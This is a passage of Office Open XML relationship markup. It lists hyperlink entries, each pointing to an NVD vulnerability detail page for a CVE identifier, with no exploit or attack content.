TargetMode="External" Id="rId2930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85525" TargetMode="External" Id="rId2931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86166" TargetMode="External" Id="rId2932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86187" TargetMode="External" Id="rId2933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86746" TargetMode="External" Id="rId2934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87812" TargetMode="External" Id="rId2935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89161" TargetMode="External" Id="rId2936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9697" TargetMode="External" Id="rId2937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15679" TargetMode="External" Id="rId2938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-54518" TargetMode="External" Id="rId2939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11837" TargetMode="External" Id="rId2940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13201" TargetMode="External" Id="rId2941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15431" TargetMode="External" Id="rId2942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18058" TargetMode="External" Id="rId2943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18755" TargetMode="External" Id="rId2944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId2945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId2946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId2947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30819" TargetMode="External" Id="rId2948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39883" TargetMode="External" Id="rId2949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40542" TargetMode="External" Id="rId2950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41605" TargetMode="External" Id="rId2951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43869" TargetMode="External" Id="rId2952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44185" TargetMode="External" Id="rId2953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId2954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47878" TargetMode="External" Id="rId2955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48098" TargetMode="External" Id="rId2956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49314" TargetMode="External" Id="rId2957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50058" TargetMode="External" Id="rId2958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50059" TargetMode="External" Id="rId2959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50060" TargetMode="External" Id="rId2960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50061" TargetMode="External" Id="rId2961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50062" TargetMode="External" Id="rId2962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50063" TargetMode="External" Id="rId2963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50064" TargetMode="External" Id="rId2964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54737" TargetMode="External" Id="rId2965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55538" TargetMode="External" Id="rId2966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61409" TargetMode="External" Id="rId2967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63404" TargetMode="External" Id="rId2968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67326" TargetMode="External" Id="rId2969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67434" TargetMode="External" Id="rId2970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69097" TargetMode="External" Id="rId2971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId2972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71417" TargetMode="External" Id="rId2973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72913" TargetMode="External" Id="rId2974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75857" TargetMode="External" Id="rId2975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId2976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78485" TargetMode="External" Id="rId2977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId2978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79635" TargetMode="External" Id="rId2979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79643" TargetMode="External" Id="rId2980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79691" TargetMode="External" Id="rId2981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79692" TargetMode="External" Id="rId2982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79695" TargetMode="External" Id="rId2983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80122" TargetMode="External" Id="rId2984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId2985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81796" TargetMode="External" Id="rId2986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85028" TargetMode="External" Id="rId2987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88017" TargetMode="External" Id="rId2988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88885" TargetMode="External" Id="rId2989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88888" TargetMode="External" Id="rId2990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89087" TargetMode="External" Id="rId2991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0310" TargetMode="External" Id="rId2992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13359" TargetMode="External" Id="rId2993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14989" TargetMode="External" Id="rId2994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15984" TargetMode="External" Id="rId2995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16649" TargetMode="External" Id="rId2996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17037" TargetMode="External" Id="rId2997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17553" TargetMode="External" Id="rId2998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18164" TargetMode="External" Id="rId2999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18255" TargetMode="External" Id="rId3000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18406" TargetMode="External" Id="rId3001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18411" TargetMode="External" Id="rId3002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18579" TargetMode="External" Id="rId3003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18844" TargetMode="External" Id="rId3004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19224" TargetMode="External" Id="rId3005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19769" TargetMode="External" Id="rId3006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23855" TargetMode="External" Id="rId3007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27459" TargetMode="External" Id="rId3008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34968" TargetMode="External" Id="rId3009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38710" TargetMode="External" Id="rId3010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41567" TargetMode="External" Id="rId3011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45019" TargetMode="External" Id="rId3012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53499" TargetMode="External" Id="rId3013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54348" TargetMode="External" Id="rId3014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54605" TargetMode="External" Id="rId3015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54718" TargetMode="External" Id="rId3016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55192" TargetMode="External" Id="rId3017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6431" TargetMode="External" Id="rId3018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69246" TargetMode="External" Id="rId3019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69252" TargetMode="External" Id="rId3020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70608" TargetMode="External" Id="rId3021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71506" TargetMode="External" Id="rId3022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72825" TargetMode="External" Id="rId3023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73613" TargetMode="External" Id="rId3024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73624" TargetMode="External" Id="rId3025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73769" TargetMode="External" Id="rId3026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73787" TargetMode="External" Id="rId3027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74925" TargetMode="External" Id="rId3028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74998" TargetMode="External" Id="rId3029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75593" TargetMode="External" Id="rId3030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75927" TargetMode="External" Id="rId3031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId3032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76562" TargetMode="External" Id="rId3033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77233" TargetMode="External" Id="rId3034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77263" TargetMode="External" Id="rId3035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77830" TargetMode="External" Id="rId3036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78438" TargetMode="External" Id="rId3037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79426" TargetMode="External" Id="rId3038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79972" TargetMode="External" Id="rId3039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80127" TargetMode="External" Id="rId3040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId3041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81431" TargetMode="External" Id="rId3042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81754" TargetMode="External" Id="rId3043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId3044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81825" TargetMode="External" Id="rId3045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId3046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId3047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83593" TargetMode="External" Id="rId3048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83595" TargetMode="External" Id="rId3049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83625" TargetMode="External" Id="rId3050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84293" TargetMode="External" Id="rId3051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId3052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85160" TargetMode="External" Id="rId3053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85165" TargetMode="External" Id="rId3054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85166" TargetMode="External" Id="rId3055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85213" TargetMode="External" Id="rId3056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85214" TargetMode="External" Id="rId3057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86541" TargetMode="External" Id="rId3058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86544" TargetMode="External" Id="rId3059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87021" TargetMode="External" Id="rId3060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88272" TargetMode="External" Id="rId3061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88273" TargetMode="External" Id="rId3062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88274" TargetMode="External" Id="rId3063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88275" TargetMode="External" Id="rId3064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88276" TargetMode="External" Id="rId3065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88282" TargetMode="External" Id="rId3066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88891" TargetMode="External" Id="rId3067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37277" TargetMode="External" Id="rId3068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-48007" TargetMode="External" Id="rId3069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-35499" TargetMode="External" Id="rId3070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51010" TargetMode="External" Id="rId3071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51012" TargetMode="External" Id="rId3072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51013" TargetMode="External" Id="rId3073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51014" TargetMode="External" Id="rId3074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51015" TargetMode="External" Id="rId3075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51018" TargetMode="External" Id="rId3076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54392" TargetMode="External" Id="rId3077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54396" TargetMode="External" Id="rId3078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-14047" TargetMode="External" Id="rId3079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58380" TargetMode="External" Id="rId3080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-29419" TargetMode="External" Id="rId3081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71400" TargetMode="External" Id="rId3082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71403" TargetMode="External" Id="rId3083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71409" TargetMode="External" Id="rId3084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71412" TargetMode="External" Id="rId3085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71417" TargetMode="External" Id="rId3086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId3087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16007" TargetMode="External" Id="rId3088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16118" TargetMode="External" Id="rId3089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16281" TargetMode="External" Id="rId3090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId3091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17627" TargetMode="External" Id="rId3092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18497" TargetMode="External" Id="rId3093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18620" TargetMode="External" Id="rId3094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 